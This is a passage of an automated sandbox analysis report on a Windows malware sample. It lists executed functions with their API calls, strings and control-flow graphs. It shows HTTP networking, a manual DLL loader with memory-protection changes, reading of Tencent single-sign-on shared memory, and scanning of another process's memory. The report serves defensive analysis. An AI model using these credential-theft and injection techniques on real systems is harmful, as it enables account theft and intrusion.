115478->115481 115478->115482 115479 4de243 SetHandleCount 115479->115441 115480 4dc45e _rand 24 API calls 115480->115485 115481->115482 115482->115478 115482->115479 115483 4de17e 115483->115482 115484 4de1a0 GetFileType 115483->115484 115484->115483 115485->115480 115485->115482 115485->115483 115487 4ddc6d _rand 115486->115487 115488 4dc45e _rand 24 API calls 115487->115488 115489 4ddc9f 115488->115489 115496 4ddcb3 _rand 115489->115496 115506 4dc28a 7 API calls _rand 115489->115506 115490 4ddcf6 115492 4dc375 _rand 24 API calls 115490->115492 115493 4ddd02 115492->115493 115493->115444 115494 4dc45e _rand 24 API calls 115494->115496 115496->115490 115496->115494 115507 4dc28a 7 API calls _rand 115496->115507 115499->115450 115500->115452 115501->115457 115502->115460 115503->115464 115504->115468 115505->115476 115506->115496 115507->115496

                                                                Executed Functions

                                                                Function 00404C1A Relevance: 66.4, APIs: 17, Strings: 20, Instructions: 1683networkfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                • InternetOpenA.WININET(?,00000003,?,004EE2EC,00000000), ref: 00404FB4
                                                                • InternetOpenA.WININET(?,00000003,?,004EE2EC,00000000), ref: 0040501C
                                                                • InternetOpenA.WININET(?,00000003,?,004EE2EC,00000000), ref: 0040507C
                                                                • InternetConnectA.WININET(00000000,?,?,?,?,00000003,00000000,00000000), ref: 0040516C
                                                                • InternetCloseHandle.WININET(00000000), ref: 004051DB
                                                                • HttpOpenRequestA.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,?,00000000), ref: 00405383
                                                                • InternetCloseHandle.WININET(00000000), ref: 004053F2
                                                                • InternetCloseHandle.WININET(00000000), ref: 0040541E
                                                                • InternetSetOptionA.WININET(00000000,0000001F,00000000,00000004), ref: 0040546A
                                                                • HttpSendRequestA.WININET(00000000,?,00000000,00000000,00000000), ref: 00405806
                                                                • HttpSendRequestA.WININET(00000000,?,00000000,00000000,00000000), ref: 0040592C
                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 004059AC
                                                                • HttpQueryInfoA.WININET(00000000,00000016,00000000,00000000,00000000), ref: 00405AAB
                                                                • InternetCloseHandle.WININET(00000000), ref: 00405AD7
                                                                • InternetCloseHandle.WININET(00000000), ref: 00405B03
                                                                • InternetCloseHandle.WININET(00000000), ref: 00405B2F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandle$Open$Http$Request$Send$ConnectFileInfoOptionQueryRead
                                                                • String ID: Accept-Language: zh-cn$Accept: */*$Content-Type: application/x-www-form-urlencoded$Cookie: $Referer: $Accept-Language:$Accept:$Accept: */*$Content-Type:$Cookie:$GET$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$Referer:$SOCKS=$Set-Cookie$Set-Cookie:$User-Agent:$http=$https://
                                                                • API String ID: 1104500937-800079585
                                                                • Opcode ID: 3923d819c6e7fd806b54cf0fb44227f2a451b96b0f7bba4b9afe3a24b806bfb6
                                                                • Instruction ID: 3487847d62d66b15dd1303eb1634049b0c62095754e2fd05f0ac3a769375eacf
                                                                • Opcode Fuzzy Hash: 3923d819c6e7fd806b54cf0fb44227f2a451b96b0f7bba4b9afe3a24b806bfb6
                                                                • Instruction Fuzzy Hash: 33C271B1F40354BBEB10EF96EC82B9E77B5EB18714F14003AFA05BA2C2D6795D108B59
                                                                Function 00409662 Relevance: 46.3, APIs: 11, Strings: 15, Instructions: 763librarymemoryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040A136: GetProcessHeap.KERNEL32(?,0041C74B,?,00429A2F), ref: 0040A159
                                                                  • Part of subcall function 0040A136: RtlAllocateHeap.NTDLL(?,00000000,00000018), ref: 0040A192
                                                                  • Part of subcall function 0040A136: RtlInitializeCriticalSection.NTDLL ref: 0040A1C6
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040980A
                                                                • VirtualAlloc.KERNEL32(00000000,00000200,00001000,00000040,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00409889
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004098D4
                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409932
                                                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 00409991
                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004099C7
                                                                • RtlCreateUnicodeStringFromAsciiz.NTDLL(00000000,00000000), ref: 00409F1F
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000000,00000000), ref: 00409F7D
                                                                • RtlFreeAnsiString.NTDLL(00000000), ref: 00409FAA
                                                                • RtlLeaveCriticalSection.NTDLL(004F823C), ref: 0040A0B0
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,00000000), ref: 0040A0F0
                                                                  • Part of subcall function 0040A535: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040A592
                                                                  • Part of subcall function 0040A535: GetModuleFileNameA.KERNEL32(00000000,00000100), ref: 0040A614
                                                                  • Part of subcall function 0040A535: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000), ref: 0040A6B7
                                                                  • Part of subcall function 0040A535: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040A6F7
                                                                  • Part of subcall function 0040A535: VirtualFree.KERNEL32(00000000,00008000,00000000,00000000,00000000,?,?,00000000), ref: 0040A7B2
                                                                  • Part of subcall function 0040A535: VirtualProtect.KERNEL32(?,00000005,00000040,00000000,00000000,?,00000000,00000005,?,?,?,?,?,00000000,00000000), ref: 0040A9C5
                                                                  • Part of subcall function 0040A535: VirtualProtect.KERNEL32(?,00000005,00000040,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0040AA67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Load$Library$CriticalFreeHeapSection$AllocModuleProcessProtectString$AllocateAnsiAsciizCreateEnterFileFromHandleInitializeLeaveNameUnicode
                                                                • String ID: NtClose$NtCreateFile$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtQueryAttributesFile$NtQueryInformationFile$NtQueryVolumeInformationFile$NtReadFile$NtSetInformationFile$RtlMoveMemory$VirtualProtect$\??\$kernel32.dll$ntdll.dll
                                                                • API String ID: 2342276934-1620435291
                                                                • Opcode ID: a9f9367986910d8fc6393f3891df1bc071a778b5e9cdd406c24e9eb902456b7b
                                                                • Instruction ID: b3fef5732e814daf5aa1c2ccea742f75e661dbde687e91b05b756fbea03c6a59
                                                                • Opcode Fuzzy Hash: a9f9367986910d8fc6393f3891df1bc071a778b5e9cdd406c24e9eb902456b7b
                                                                • Instruction Fuzzy Hash: 95526D71E01308ABEB10EF95ED82BAEB675EB05314F20103AF605BA2D2D7795D50CB5E
                                                                Function 00401326 Relevance: 41.7, APIs: 5, Strings: 18, Instructions: 1409fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenFileMappingA.KERNEL32(00000004,00000000,TX_SSO_SHARE_INFO_0), ref: 00401476
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 004014BF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$MappingOpenView
                                                                • String ID: 000366F575200070B97D87E8C711BADA8ADCAF68322D7EE37225BD129C4B78DFDC549D5529664282549B60D56803B4A58AB59D2FE40DD7AAC45D380531C6120936D819B8B4A73A634A68A2BF2A6ED2542705E23B74B785D9A92B8AE497A844A5CFE0E2605DEECD773ECAD0A92AEB2AF7046E4223E913C0F9$8003$85E792E781E7B3E7A0E7B3E7B8E7A0E7B3E7ACE782E79EE7$87E590E583E5B6E580E596E596E58CE58AE58BE5AEE580E59CE5$87E590E583E5B6E58CE582E5B6E580E596E596E58CE58AE58BE5$91F386F395F3A7F3B4F3A7F3$@N$AFCBBCCB98CB98CB84CB94CB8ACBA8CBA8CBA4CBBECBA5CBBFCB94CBAFCBBCCB8ACBA8CBA8CBA4CBBECBA5CBBFCB9ECBA2CBA5CB$TX_SSO_SHARE_INFO_0$h $h.$h.$hN$hN$jjj$jjj$tgp_daemon.exe$wegame.exe
                                                                • API String ID: 3439327939-2767017367
                                                                • Opcode ID: 81ce84bf1678faba9514cd4a145f00f47845c6f511143a2d03661ed4039b29f0
                                                                • Instruction ID: b97c0e518f47852a826e6396cd76d5b16d0cc7b2db04b444362a48abd3bc2168
                                                                • Opcode Fuzzy Hash: 81ce84bf1678faba9514cd4a145f00f47845c6f511143a2d03661ed4039b29f0
                                                                • Instruction Fuzzy Hash: 22B246B1F00358AFEB10DFA5DC86F9E77B8AB08304F1400BAF609F6292D6755E548B59
                                                                Function 0040A535 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 416librarymemoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1433 40a535-40a584 1434 40a7e2-40a7e9 1433->1434 1435 40a58a-40a59f LoadLibraryA 1433->1435 1438 40a800 1434->1438 1439 40a7ef-40a7f6 1434->1439 1436 40a5a1-40a5b5 call 429a74 1435->1436 1437 40a5b8-40a5c4 1435->1437 1436->1437 1437->1434 1441 40a5ca-40a5f4 call 42bbe0 1437->1441 1443 40a805-40a807 1438->1443 1439->1438 1442 40a7fc-40a7fe 1439->1442 1454 40a5f6-40a5fc call 429a56 1441->1454 1455 40a5ff-40a621 GetModuleFileNameA 1441->1455 1442->1443 1446 40a817-40a840 call 40a245 1443->1446 1447 40a80d-40a812 1443->1447 1456 40a850-40a865 call 40a245 1446->1456 1457 40a846-40a84b 1446->1457 1448 40aa9d-40aaa3 1447->1448 1452 40aaa5-40aaab call 429a56 1448->1452 1453 40aaae-40aab3 1448->1453 1452->1453 1459 40aab5-40aabb call 429a56 1453->1459 1460 40aabe-40aac2 1453->1460 1454->1455 1462 40a623-40a637 call 429a74 1455->1462 1463 40a63a-40a641 1455->1463 1476 40a875-40a8d5 call 42b920 1456->1476 1477 40a86b-40a870 1456->1477 1457->1448 1459->1460 1462->1463 1463->1434 1464 40a647-40a653 1463->1464 1471 40a655 1464->1471 1472 40a65a-40a679 call 42c250 1464->1472 1471->1472 1480 40a684-40a69c call 40a1f0 1472->1480 1481 40a67b-40a681 call 429a56 1472->1481 1485 40a8e0-40a9d2 call 40abf0 call 401046 call 40ac3d call 42c090 call 401046 VirtualProtect 1476->1485 1486 40a8d7-40a8dd call 429a56 1476->1486 1477->1448 1480->1434 1492 40a6a2-40a6c4 VirtualAlloc 1480->1492 1481->1480 1519 40a9d4-40a9e8 call 429a74 1485->1519 1520 40a9eb-40a9f2 1485->1520 1486->1485 1495 40a6c6-40a6da call 429a74 1492->1495 1496 40a6dd-40a6e9 1492->1496 1495->1496 1496->1434 1498 40a6ef-40a704 LoadLibraryA 1496->1498 1502 40a706-40a71a call 429a74 1498->1502 1503 40a71d-40a73c call 40a245 1498->1503 1502->1503 1511 40a747-40a76c call 40a245 1503->1511 1512 40a73e-40a744 call 429a56 1503->1512 1521 40a777-40a799 call 40aac5 1511->1521 1522 40a76e-40a774 call 429a56 1511->1522 1512->1511 1519->1520 1526 40a9f8-40aa1a 1520->1526 1527 40aa1f-40aa3d call 40ac3d 1520->1527 1521->1434 1533 40a79f-40a7bf VirtualFree 1521->1533 1522->1521 1526->1448 1534 40aa43-40aa74 VirtualProtect 1527->1534 1535 40aa8d-40aa98 1527->1535 1536 40a7c1-40a7d5 call 429a74 1533->1536 1537 40a7d8 1533->1537 1534->1535 1538 40aa76-40aa8a call 429a74 1534->1538 1535->1448 1536->1537 1537->1434 1538->1535
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040A592
                                                                • GetModuleFileNameA.KERNEL32(00000000,00000100), ref: 0040A614
                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000), ref: 0040A6B7
                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040A6F7
                                                                • VirtualFree.KERNEL32(00000000,00008000,00000000,00000000,00000000,?,?,00000000), ref: 0040A7B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoadVirtual$AllocFileFreeModuleName
                                                                • String ID: @$RtlMoveMemory$VirtualProtect$kernel32.dll$ntdll.dll
                                                                • API String ID: 2588548563-3509220722
                                                                • Opcode ID: 4851506355bb36296e64d2c209bf4e2fbf9e8c961bd7b4444181c30ce4c8edac
                                                                • Instruction ID: ca07fe7d52d382fe171430fc46f04095505581b5e57dbb9533913919d189fc1d
                                                                • Opcode Fuzzy Hash: 4851506355bb36296e64d2c209bf4e2fbf9e8c961bd7b4444181c30ce4c8edac
                                                                • Instruction Fuzzy Hash: 05F1D171E00318ABEB00DF95D8C5BDDBBB4AB0D310F14506AEA047A292D7756964CF6A
                                                                Function 00403A0C Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 424comCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1543 403a0c-403ae6 call 429a5c * 4 CoInitialize 1552 403ae8-403afc call 429a74 1543->1552 1553 403aff-403b3c CoInitializeSecurity 1543->1553 1552->1553 1555 403b55-403b6e call 403f00 1553->1555 1556 403b3e-403b52 call 429a74 1553->1556 1562 403b70-403b76 call 429a56 1555->1562 1563 403b79-403bb6 call 429a56 * 2 call 40461e 1555->1563 1556->1555 1562->1563 1572 403bc1-403ca5 call 429a56 * 2 call 429a5c * 2 CoCreateInstance 1563->1572 1573 403bb8-403bbe call 429a56 1563->1573 1584 403ca7-403cbb call 429a74 1572->1584 1585 403cbe-403d04 call 429f70 1572->1585 1573->1572 1584->1585 1590 403d15-403d18 1585->1590 1591 403d06 1585->1591 1593 403d1a 1590->1593 1594 403d1f-403d78 call 429a56 call 429f70 1590->1594 1592 403d08-403d0c 1591->1592 1596 403d13 1592->1596 1597 403d0e-403d11 1592->1597 1593->1594 1601 403d89-403d8c 1594->1601 1602 403d7a 1594->1602 1596->1590 1597->1592 1604 403d93-403daf call 429a56 1601->1604 1605 403d8e 1601->1605 1603 403d7c-403d80 1602->1603 1606 403d82-403d85 1603->1606 1607 403d87 1603->1607 1610 403db5-403e03 call 40480f call 404884 SysFreeString 1604->1610 1611 403e8d-403e9d CoUninitialize 1604->1611 1605->1604 1606->1603 1607->1601 1623 403e05-403e19 call 429a74 1610->1623 1624 403e1c-403e20 1610->1624 1613 403eb6-403ebb 1611->1613 1614 403e9f-403eb3 call 429a74 1611->1614 1615 403ec0-403efd call 429a56 * 4 1613->1615 1614->1613 1623->1624 1624->1611 1627 403e26-403e5c CoSetProxyBlanket 1624->1627 1630 403e75-403e83 call 4048bc 1627->1630 1631 403e5e-403e72 call 429a74 1627->1631 1630->1615 1631->1630
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 00403AD9
                                                                • CoInitializeSecurity.COMBASE(00000000,FFFFFFFF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00403B2F
                                                                • CoCreateInstance.COMBASE(00000000,00000000,00000000), ref: 00403C98
                                                                • CoUninitialize.COMBASE ref: 00403E90
                                                                  • Part of subcall function 0040480F: SysAllocString.OLEAUT32(?), ref: 0040483D
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403DF6
                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00403E4F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeString$AllocBlanketCreateFreeInstanceProxySecurityUninitialize
                                                                • String ID: {4590f811-1d3a-11d0-891f-00aa004b2e24}${dc12a687-737f-11cf-884d-00aa004b2e24}$7@$7@
                                                                • API String ID: 1092132261-1252387871
                                                                • Opcode ID: 7696857a22e414a27a6fd583d34635aa6cf50c63e144fafc709a209e06621016
                                                                • Instruction ID: cfc26d1bc2f6de21044264064bf03f8d0852b47ac918b2d33f3114841c8566df
                                                                • Opcode Fuzzy Hash: 7696857a22e414a27a6fd583d34635aa6cf50c63e144fafc709a209e06621016
                                                                • Instruction Fuzzy Hash: 6BD193B1E40345ABEB00DF95ECC2B9EB7B8EF19324F145036E505BB381D279A910CB66
                                                                Function 00440195 Relevance: 13.6, APIs: 5, Strings: 2, Instructions: 1312nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1757 440195-44033c call 4c9625 * 11 1780 440341-440369 call 4c9625 1757->1780 1783 44036b-440383 call 439e30 1780->1783 1786 44038e 1783->1786 1787 440389 1783->1787 1789 440395-4403bc NtQueryVirtualMemory 1786->1789 1788 440f0b-440f95 call 4c962b * 8 1787->1788 1848 440f97 1788->1848 1849 440fa8 1788->1849 1791 4403d5-4403dc 1789->1791 1792 4403be-4403d2 call 4c9631 1789->1792 1795 4403e2-4403f1 1791->1795 1796 440ecb 1791->1796 1792->1791 1797 4403f7-440473 call 4c9625 NtQueryVirtualMemory 1795->1797 1798 440e3e-440ec6 call 43926d call 4cb7c0 call 43926d 1795->1798 1799 440ed2-440ed9 1796->1799 1810 440475-440489 call 4c9631 1797->1810 1811 44048c-4404e1 call 4ca2b0 1797->1811 1798->1799 1799->1789 1803 440edf-440ef2 CloseHandle 1799->1803 1803->1788 1807 440ef4-440f08 call 4c9631 1803->1807 1807->1788 1810->1811 1824 4404f2-4404f8 1811->1824 1825 4404e3 1811->1825 1829 4404ff-44051e call 4c962b 1824->1829 1830 4404fa 1824->1830 1828 4404e5-4404e9 1825->1828 1834 4404f0 1828->1834 1835 4404eb-4404ee 1828->1835 1829->1798 1838 440524-440654 call 4c9625 ReadProcessMemory 1829->1838 1830->1829 1834->1824 1835->1828 1844 440656-44066a call 4c9631 1838->1844 1845 44066d-44072d call 4ca2b0 1838->1845 1844->1845 1858 44073e-440741 1845->1858 1859 44072f 1845->1859 1852 440f99-440f9d 1848->1852 1854 440fc3-440fe2 call 4c962b * 3 1849->1854 1855 440fae-440fc1 call 4c962b 1849->1855 1856 440fa4-440fa6 1852->1856 1857 440f9f-440fa2 1852->1857 1880 440fe4-440fea call 4c962b 1854->1880 1881 440fed-440ff0 1854->1881 1855->1854 1856->1849 1857->1852 1862 440743 1858->1862 1863 440748-44078a call 4ca2b0 1858->1863 1865 440731-440735 1859->1865 1862->1863 1874 44078c 1863->1874 1875 44079b-44079e 1863->1875 1869 440737-44073a 1865->1869 1870 44073c 1865->1870 1869->1865 1870->1858 1877 44078e-440792 1874->1877 1878 4407a5-4407d4 call 4c962b 1875->1878 1879 4407a0 1875->1879 1882 440794-440797 1877->1882 1883 440799 1877->1883 1878->1798 1888 4407da-4409c4 call 4c9625 1878->1888 1879->1878 1880->1881 1882->1877 1883->1875 1891 4409ca-4409e8 1888->1891 1891->1891 1892 4409ee-440a0f call 43926d ReadProcessMemory 1891->1892 1895 440a11-440a25 call 4c9631 1892->1895 1896 440a28-440bd0 1892->1896 1895->1896 1898 440bd6-440bfc 1896->1898 1898->1898 1900 440c02-440c29 call 4c962b 1898->1900 1900->1798 1903 440c2f-440c4c call 440ff3 1900->1903 1906 440c57-440c67 1903->1906 1907 440c4e-440c54 call 4c962b 1903->1907 1909 440c6e-440cc3 call 4cb760 * 2 1906->1909 1910 440c69 1906->1910 1907->1906 1916 440cc5 1909->1916 1917 440cca-440cd7 1909->1917 1910->1909 1916->1917 1918 440cde-440cf9 call 4cada0 1917->1918 1919 440cd9 1917->1919 1922 440d04-440d09 1918->1922 1923 440cfb-440d01 call 4c962b 1918->1923 1919->1918 1925 440d14-440d18 1922->1925 1926 440d0b-440d11 call 4c962b 1922->1926 1923->1922 1929 440d1e-440d48 1925->1929 1930 440d88-440d9a 1925->1930 1926->1925 1933 440d4f-440d69 call 4cada0 1929->1933 1934 440d4a 1929->1934 1930->1798 1931 440da0-440e39 call 43926d call 4cb7c0 call 43926d 1930->1931 1931->1799 1940 440d6f 1933->1940 1941 440d79-440d83 call 4c9655 1933->1941 1934->1933 1940->1803 1941->1803
                                                                APIs
                                                                • NtQueryVirtualMemory.NTDLL(00000000,00001000,00000000,?,0000001C,00000000), ref: 004403AF
                                                                • NtQueryVirtualMemory.NTDLL(00000000,00001000,00000002,00000000,?,?), ref: 00440466
                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000108,00000000,?,?,-00000044,?,?,-00000004), ref: 00440647
                                                                • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,00000108,00000000), ref: 00440A02
                                                                • CloseHandle.KERNEL32(00000000,?,?,-00000044,?,?,-00000004), ref: 00440EE5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
